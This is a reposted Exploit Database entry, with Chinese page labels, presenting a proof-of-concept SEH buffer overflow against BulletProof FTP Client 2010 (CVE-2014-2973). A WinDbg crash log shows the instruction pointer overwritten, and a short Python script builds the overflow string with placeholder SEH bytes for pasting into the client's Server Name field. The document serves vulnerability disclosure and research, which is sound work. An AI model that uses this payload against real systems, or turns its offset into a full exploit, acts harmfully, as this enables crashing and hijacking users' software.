BulletProof FTP Client 2010 – Buffer Overflow (SEH) (PoC)

• Exploit Database
• 16 阅读

• 作者： Gabor Seljan
  日期： 2014-07-24
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/34162/

• #-----------------------------------------------------------------------------#
  # Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH)#
  # Date: Jul 24 2014 #
  # Exploit Author: Gabor Seljan#
  # Software Link: http://www.bpftp.com/#
  # Version: 2010.75.0.76 #
  # Tested on: Windows XP SP3 #
  # CVE: CVE-2014-2973#
  #-----------------------------------------------------------------------------#
  
  '''
  (a00.9e4): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  eax=41414141 ebx=41414141 ecx=007ef590 edx=00000000 esi=017a4f6a edi=017a516a
  eip=005c005b esp=0012f594 ebp=0012f610 iopl=0 nv up ei pl zr na pe nc
  cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010246
  *** ERROR: Symbol file could not be found.Defaulted to export symbols for bpftpclient.exe -
  bpftpclient+0x1c005b:
  005c005b f6431c10testbyte ptr [ebx+1Ch],10h ds:0023:4141415d=??
  0:000> !exchain
  0012f59c: bpftpclient+1c044e (005c044e)
  0012f5a8: bpftpclient+1c046b (005c046b)
  0012f618: 43434343
  Invalid exception stack at 42424242
  0:000> g
  (a00.9e4): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  eax=00000000 ebx=00000000 ecx=43434343 edx=7c9032bc esi=00000000 edi=00000000
  eip=43434343 esp=0012f1c4 ebp=0012f1e4 iopl=0 nv up ei pl zr na pe nc
  cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010246
  43434343 ?????
  '''
  
  #!/usr/bin/python
  
  junk1 = b'\x41' * 89
  nSEH= b'\x42' * 4
  SEH = b'\x43' * 4
  junk2 = b'\x44' * 1000
  
  sploit = junk1 + nSEH + SEH + junk2
  
  try:
  print('[+] Creating exploit file...')
  f = open('sploit.txt', 'wb')
  f.write(sploit)
  f.close()
  print('[+] Exploit file created successfully!')
  except:
  print('[!] Error while creating exploit file!')
  
  print('[+] Use the following as Server Name/IP with any user\'s credentials!')
  print(sploit.decode())
  
  ##EDB Note: You can also enter the contents of the file in the "Enter URL" to cause this crash.